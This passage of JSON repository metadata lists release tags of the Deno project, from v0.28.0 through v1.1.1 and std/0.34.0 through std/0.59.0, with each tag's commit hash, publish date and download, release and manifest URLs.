d/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/den